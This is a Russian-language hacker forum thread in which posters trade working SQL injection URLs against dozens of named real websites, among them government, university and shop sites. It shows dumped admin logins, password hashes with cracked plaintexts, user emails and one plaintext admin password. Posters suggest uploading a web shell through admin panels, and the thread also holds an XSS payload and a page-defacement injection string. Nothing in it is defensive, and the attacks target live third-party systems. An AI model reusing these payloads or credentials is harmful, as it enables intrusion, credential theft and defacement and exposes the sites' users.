SQL Инъекции

Как мне нравится когда удаётся всю инфу достать (версия мускула там 4):

Code:

http://www.numizmatik.ru/news/read.php?news=-1+union+select+1,2,3,concat(fio,char(58),userlogin,char(58),userpassword,char(58),email),5,6,7,8+from+user/*

P.S. скуля траф жрёт - т.к. все записи выводит, так что кто за траф платит...

 

www.quadrasoft.com.ua

Code:

http://www.quadrasoft.com.ua/web/news.php?id=-1+union+select+1,2,concat(user(),char(58),version()),4/*

 

Code:

http://www.bulfurniture.com/php/news_more.php?id=-52+union+select+1,username,3,4,5,password,7,8+from+user/*

Code:

http://www.horoskopa.com/signs.php?id=-8+union+select+1,convert(version()%20using%20cp1251)/*

lukabloom.com

Code:

http://www.lukabloom.com/shop.php?id=-98%20UNION%20SELECT%201,2,3,4,5,concat(username,0x3a,password),7,8,9,10,11,12,13,14+from+admin/*

user:lukabloom
password:luka_shop27
http://www.lukabloom.com/admin/ (в нашем случае админка
служит для заливки шелла)

 

Вот эту смотреть только через проксю:

Там много таблиц, есть и с более интересными названиями, но их не могу выкладывать по правилам форума, для примера таблица с юзверями.

Code:

http://tss.groteck.ru/newstext.php?news_id=-1+union+select+1,2,concat(database(),char(58),user(),char(58),version()),4,5/*
http://tss.groteck.ru/newstext.php?news_id=-1+union+select+1,2,table_name,4,5+from+information_schema.tables+limit+48,1/*
http://tss.groteck.ru/newstext.php?news_id=-1+union+select+1,2,column_name,4,5+from+information_schema.columns+where+table_name=char(109,111,115,95,117,115,101,114,115)+limit+0,1/*
http://tss.groteck.ru/newstext.php?news_id=-1+union+select+1,2,concat(id,char(58),name,char(58),username,char(58),email,char(58),password,char(58),usertype),4,5+from+Mambo.mos_users/*

--------------------------------------------------------------------

Code:

http://www.filmec.ru/index.php?id=-1+union+select+1,concat(database(),char(58),user(),char(58),version())/*

Code:

http://www.rmdb.ru/?company&id=-1+union+select+1,concat(database(),char(58),user(),char(58),version())/*

 

мб было, но..

Code:

http://www.biosens.ru/index.php?res=folder&rec=-1+union+select+1,concat(login,0x3a,password)+from+users/*

там же пассивная xss

Code:

http://www.biosens.ru/index.php?res=folder&rec=%3Cscript%3Ealert(/xss/)%3C/script%3E

 

Code:

http://www.voladm.gov.ua/news.php?id=-1804+union+select+1,2,3,4,5,user,7,8,9,10,password,12,13,14+from+mysql.user/*

 

Code:

http://www.tiic.ru/sub_t.php?id_ur=3&id=-1+union+select+1,2,concat(username,char(58),user_password)+from+forum_users/*

P.S. скуля траф жрёт - т.к. все записи выводит, так что кто за траф платит...

P.P.S вторая такая за сегодня)

 

2 Grey
http://www.tiic.ru/sub_t.php?id_ur=3&id=-1+union+select+1,2,concat(username,char(58),user_password)+from+forum_users+limit+1,1/*

 

Не дадим прожить ДОМу 3 ?
dom3mir.ru

Регистрируемся с любыми данными......
Далее идем изменять свою анкету...
В уязвимые поля: Район, Метро,Город пишем такой код..ну там уж как придумаете вставляете всякие sql запросы....
Далее оставляете сообщение на форуме...нажимаете на свой ник над авой....(смотрите свой профильс другой стороны типа) и вот скуль =)
Примерна такая:

Code:

Error: 1064 .... You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'onmouseover="alert('xss')""' at line 1

 

mssql

Code:

http://www.ballroom.ru/new/i.asp?id=6&c=133&o=-1+union+all+select+1,2,3,table_name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+information_schema.tables--

mysql

Code:

http://stroykaveka.ru/catalog.php?enter=firm&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,table_name,16,17,18,19,20,21,22,23,24+from+information_schema.tables+limit+58,1/*

 

http://moto.ru/news/motonews.php?id=-569+union+select+1,concat(login,char(58),password,char(58),email),3+from+user+limit+0,1/*

 

doctor-al.ru

#блог - wordpress(ru)

Code:

http://doctor-al.ru/get_news.php?news_id=-1+union+select+1,2,3,concat_ws(0x3a,user_login,user_pass,user_email),5,6,7+from+wp_users/*&type=news

admin:bcbe4299f228fe2c719266277c7d360f:[email protected] == b08323

идем дальше..
#форум - phpbb

Code:

http://doctor-al.ru/get_news.php?news_id=-1+union+select+1,2,3,concat_ws(0x3a,username,user_password,user_email),5,6,7+from+phpbb_users+limit+1,1/*&type=news

admin:8542516f8870173d7d1daba1daaaf0a1:[email protected] == 12321
мда, админы не меняются
можете попробовать залить шелл.

и напоследок
#shop

Code:

http://doctor-al.ru/get_news.php?news_id=-1+union+select+1,2,3,concat_ws(0x3a,login,password,email),5,6,7+from+shop_users+limit+0,1/*&type=news

расшифровал пару хешей ради интереса.. ничего примечательного в шопе не нашел.
nytro:827ccb0eea8a706c4c34a16891f84e7b:[email protected] == 12345

думаю, пути к формам авторизации найдете сами

 

Code:

http://zjz.moc.gov.cn/cms/news.php?infoid=-2731+union+select+1,2,3,4,5,user,7,8,9,10,11,12,13,14,15,16,17,password,19,20,21+from+mysql.user/*

 

____

 

A FATAL MYSQL ERROR
http://keygen.us/top/comments.php?id='+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100/*

Мот кто подберет, я так и не подобрал... хотя до 100 дошел.

 

Прошолся по шопам и настигла неудача с таблицами=\

Code:

http://www.sokkia.hu/shop/shopping/index.php?id=-10+union+select+1,AES_DECRYPT(AES_ENCRYPT(version(),0x71),0x71),3+from+users/*

Code:

http://www.schleifer.hu/shop.php?id=-65+union+select+1,AES_DECRYPT(AES_ENCRYPT(database(),0x71),0x71),3+from+users/*

Code:

http://demo.skymarket.hu/shop.php?id=-2+union+select+1,AES_DECRYPT(AES_ENCRYPT(database(),0x71),0x71),3,4+from+users/*

 

www.islet.ru

магаз

Code:

http://www.islet.ru/subcategory.php?SCID=-1+union+select+1,convert(version(),char)/*

 

http://www.ihrc.org.uk/show.php?id=-1+union+select+1,2,CHAR(60,72,49,62,104,97,99,107,101,100,32,98,121,32,103,101,110,111,109,60,47,72,49,62),4,5,6,7,8,9,10,11,12,13

найдено с использованием google dump-er

 

Code:

http://skidkivtule.ru/organizations.php?org=-1+union+select+1,2,3,concat(database(),char(58),user(),char(58),version()),5,6,7,8,9,10,11,12,13,14,15,16/*

Code:

http://www.timber.ru/?show=ad&n=-1+union+select+1,2,3,concat(database(),char(58),user(),char(58),version()),5,6,7,8/*

 

http://www.mmu.ac.uk/policy/policy.php?id=-1+union+select+1,99,4,21,1,88,CHAR(60,72,49,62,104,97,99,107,%20101,100,32,98,121,32,103,101,110,111,109,60,47,72,%2049,62),66,5,5,3,4,5,6,7/*

найдено с помощью google dump-er